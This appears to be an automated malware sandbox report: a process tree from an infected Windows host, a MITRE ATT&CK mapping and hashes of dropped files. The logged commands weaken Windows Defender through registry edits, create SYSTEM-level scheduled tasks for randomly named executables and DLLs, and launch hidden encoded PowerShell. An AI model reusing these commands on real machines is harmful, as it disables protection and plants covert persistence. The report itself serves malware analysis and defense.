  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
  2⤵
  PID:5656
- - C:\Windows\SysWOW64\reg.exe
    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
    3⤵
    PID:7396
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
  2⤵
  PID:5848
- - C:\Windows\SysWOW64\reg.exe
    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
    3⤵
    PID:9632
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "GyWbuVQzPmDmgkCMH"
  2⤵
  PID:10112

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:9952

\??\c:\windows\system32\rundll32.EXE
c:\windows\system32\rundll32.EXE "C:\Windows\Temp\wUBDPVxDQVpvNZiy\ffUAlJKd\LhvveWP.dll",#1 /Odsite_idhMb 385121
1⤵
PID:9420
- C:\Windows\SysWOW64\rundll32.exe
  c:\windows\system32\rundll32.EXE "C:\Windows\Temp\wUBDPVxDQVpvNZiy\ffUAlJKd\LhvveWP.dll",#1 /Odsite_idhMb 385121
  2⤵
  PID:9648
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "HKFMMLmWpeGdwIqGl"
    3⤵
    PID:10012

C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
1⤵
PID:9792

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:1488

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
1⤵
PID:10028

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
1⤵
PID:4632

C:\ProgramData\presepuesto\LEAJ.exe
C:\ProgramData\presepuesto\LEAJ.exe
1⤵
PID:1332

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
1⤵
PID:5680

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:8732

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
1⤵
PID:10340

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:11112

C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\VqXaIPc.exe
C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\VqXaIPc.exe 3Y /Upsite_idmxV 385118 /S
1⤵
PID:11200
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  PID:10236
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:10668
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:10028
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:10476
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:10364
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3256
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:348
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:7488
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4384
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:10412
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:8488
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6496
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:10768
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:7904
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:10064
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2548
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4380
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:10476
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:10412
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5268
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4492
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6292
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:7016
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5900
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2252
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:8152
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:9524
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:7748
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2744
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3692
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "GyWbuVQzPmDmgkCMH" /SC once /ST 08:47:30 /RU "SYSTEM" /TR "\"C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\kLbipQw.exe\" KS /IZsite_idxxY 385118 /S" /V1 /F
  2⤵
  - Creates scheduled task(s)
  PID:8400
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "GyWbuVQzPmDmgkCMH"
  2⤵
  PID:3000

C:\Users\Admin\AppData\Roaming\hrdreui
C:\Users\Admin\AppData\Roaming\hrdreui
1⤵
PID:10276

C:\Users\Admin\AppData\Roaming\hgdreui
C:\Users\Admin\AppData\Roaming\hgdreui
1⤵
PID:4632

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
1⤵
PID:5524

C:\Users\Admin\AppData\Roaming\dcdreui
C:\Users\Admin\AppData\Roaming\dcdreui
1⤵
PID:10944

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
1⤵
PID:10284

C:\Users\Admin\AppData\Roaming\jddreui
C:\Users\Admin\AppData\Roaming\jddreui
1⤵
PID:10640

C:\Users\Admin\AppData\Roaming\bidreui
C:\Users\Admin\AppData\Roaming\bidreui
1⤵
PID:10964

C:\Windows\system32\WerFault.exe
"C:\Windows\system32\WerFault.exe" -k -lc PoW32kWatchdog PoW32kWatchdog-20231023-0919.dm
1⤵
PID:9312

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:10156

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
1⤵
PID:9712

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:10768

C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\kLbipQw.exe
C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\kLbipQw.exe KS /IZsite_idxxY 385118 /S
1⤵
PID:9288
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "bwpFiyeZPJPVdaMxTt"
  2⤵
  PID:6292
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
  2⤵
  PID:10672
- - C:\Windows\SysWOW64\reg.exe
    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
    3⤵
    PID:10476
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
  2⤵
  PID:10976
- - C:\Windows\SysWOW64\reg.exe
    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
    3⤵
    PID:9476
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\oVhJPNkDU\YTzcai.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "ztlTbPYifermRZH" /V1 /F
  2⤵
  - Creates scheduled task(s)
  PID:10528
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "ztlTbPYifermRZH2" /F /xml "C:\Program Files (x86)\oVhJPNkDU\cYlhKcf.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:11228
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "ztlTbPYifermRZH"
  2⤵
  PID:6236
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "ztlTbPYifermRZH"
  2⤵
  PID:6472
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "lYRFoiYPtWPCfC" /F /xml "C:\Program Files (x86)\DlbZONUGhjVU2\SKSHUJN.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:9808
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "TrprvximDXTQo2" /F /xml "C:\ProgramData\nBRnpywzcTvqknVB\Ywouttd.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:4628
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "NtSpqNxSmBAhIMqiB2" /F /xml "C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR\TbKnxnE.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:11220
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "gFXJCgZLnIrdqQxYYQs2" /F /xml "C:\Program Files (x86)\KrPQunXfXpAVC\pEiJvaQ.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:9268
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
  2⤵
  PID:9980
- - C:\Windows\SysWOW64\reg.exe
    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
    3⤵
    PID:11188
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
  2⤵
  PID:11200
- - C:\Windows\SysWOW64\reg.exe
    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
    3⤵
    PID:9364
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "GyWbuVQzPmDmgkCMH"
  2⤵
  PID:10340

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
1⤵
PID:3524

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
1⤵
PID:10884

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scripting

T1064

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

File and Directory Permissions Modification

T1222

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Scripting

T1064

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Network Service Discovery

T1046

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\MyBurn\MyBurn.exe

Filesize
2.1MB

MD5
f0fd986799e64ba888a8031782181dc7

SHA1
df5a8420ebdcb1d036867fbc9c3f9ca143cf587c

SHA256
a85af12749a97eeae8f64b767e63780978c859f389139cd153bedb432d1bfb4f

SHA512
09d8b0a6e39139c1853b5f05b1f87bbed5f38b51562cd3da8eb87be1125e8b28c2a3409d4977359cf8551a76c045de39c0419ddcef6459d9f87e10a945545233

Download Submit
C:\Program Files (x86)\MyBurn\MyBurn.exe

Filesize
2.1MB

MD5
f0fd986799e64ba888a8031782181dc7

SHA1
df5a8420ebdcb1d036867fbc9c3f9ca143cf587c

SHA256
a85af12749a97eeae8f64b767e63780978c859f389139cd153bedb432d1bfb4f

SHA512
09d8b0a6e39139c1853b5f05b1f87bbed5f38b51562cd3da8eb87be1125e8b28c2a3409d4977359cf8551a76c045de39c0419ddcef6459d9f87e10a945545233

Download Submit
C:\Program Files (x86)\MyBurn\MyBurn.exe

Filesize
2.1MB

MD5
f0fd986799e64ba888a8031782181dc7

SHA1
df5a8420ebdcb1d036867fbc9c3f9ca143cf587c

SHA256
a85af12749a97eeae8f64b767e63780978c859f389139cd153bedb432d1bfb4f

SHA512
09d8b0a6e39139c1853b5f05b1f87bbed5f38b51562cd3da8eb87be1125e8b28c2a3409d4977359cf8551a76c045de39c0419ddcef6459d9f87e10a945545233

Download Submit
C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

Filesize
1.2MB

MD5
effb178bdb01775de2aa35060b6639c3

SHA1
9fd8f98df584b3ea6f395bc6799471ccd4ef8c63

SHA256
70b27293a6f0f60f15568bae58af168c99b64cd4dde22c9a2c661367a00ca3f9

SHA512
a21fd8ce8f2805a88a5fcefb921212517bb8d4c116775a4b3912ea1410eba3f716cdfc7aec2fd6175a79c6edaaf7ed0f98c929521393af403fb3588be4cc2774

Download Submit
C:\ProgramData\41709981934472059614516114

Filesize
96KB

MD5
d367ddfda80fdcf578726bc3b0bc3e3c

SHA1
23fcd5e4e0e5e296bee7e5224a8404ecd92cf671

SHA256
0b8607fdf72f3e651a2a8b0ac7be171b4cb44909d76bb8d6c47393b8ea3d84a0

SHA512
40e9239e3f084b4b981431817ca282feb986cf49227911bf3d68845baf2ee626b564c8fabe6e13b97e6eb214da1c02ca09a62bcf5e837900160cf479c104bf77

Download Submit
C:\ProgramData\Are.docx

Filesize
11KB

MD5
a33e5b189842c5867f46566bdbf7a095

SHA1
e1c06359f6a76da90d19e8fd95e79c832edb3196

SHA256
5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454

SHA512
f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b

Download Submit
C:\ProgramData\BAFBFCBGHDGCFHJJECAF

Filesize
46KB

MD5
02d2c46697e3714e49f46b680b9a6b83

SHA1
84f98b56d49f01e9b6b76a4e21accf64fd319140

SHA256
522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9

SHA512
60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

Download Submit
C:\ProgramData\CFHDHIJDGCBAKFIEGHCBGHJDAF

Filesize
20KB

MD5
c9ff7748d8fcef4cf84a5501e996a641

SHA1
02867e5010f62f97ebb0cfb32cb3ede9449fe0c9

SHA256
4d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988

SHA512
d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73

Download Submit
C:\ProgramData\ContentDVSvc\ContentDVSvc.exe

Filesize
2.1MB

MD5
f0fd986799e64ba888a8031782181dc7

SHA1
df5a8420ebdcb1d036867fbc9c3f9ca143cf587c

SHA256
a85af12749a97eeae8f64b767e63780978c859f389139cd153bedb432d1bfb4f

SHA512
09d8b0a6e39139c1853b5f05b1f87bbed5f38b51562cd3da8eb87be1125e8b28c2a3409d4977359cf8551a76c045de39c0419ddcef6459d9f87e10a945545233

Download Submit
C:\ProgramData\JDHJKKFBAEGDGDGCBKECBGCGCF

Filesize
5.0MB

MD5
598ab357b1bfe6f35298973628927215

SHA1
632642e1689919648566584612bf65edd336fcbc

SHA256
b4a72a604cb632ad58f03822bab559a49f23837be962a7873d1df6a108001263

SHA512
112c1764d243112f616d7c022d46ee771f46f628bc59eae86801cad14f154087859f16bae6b30b703c0ac9ef03b3734a0173294fd0c5d81efa3569a88ef05039

Download Submit
C:\ProgramData\freebl3.dll

Filesize
669KB

MD5
550686c0ee48c386dfcb40199bd076ac

SHA1
ee5134da4d3efcb466081fb6197be5e12a5b22ab

SHA256
edd043f2005dbd5902fc421eabb9472a7266950c5cbaca34e2d590b17d12f5fa

SHA512
0b7f47af883b99f9fbdc08020446b58f2f3fa55292fd9bc78fc967dd35bdd8bd549802722de37668cc89ede61b20359190efbfdf026ae2bdc854f4740a54649e

Download Submit
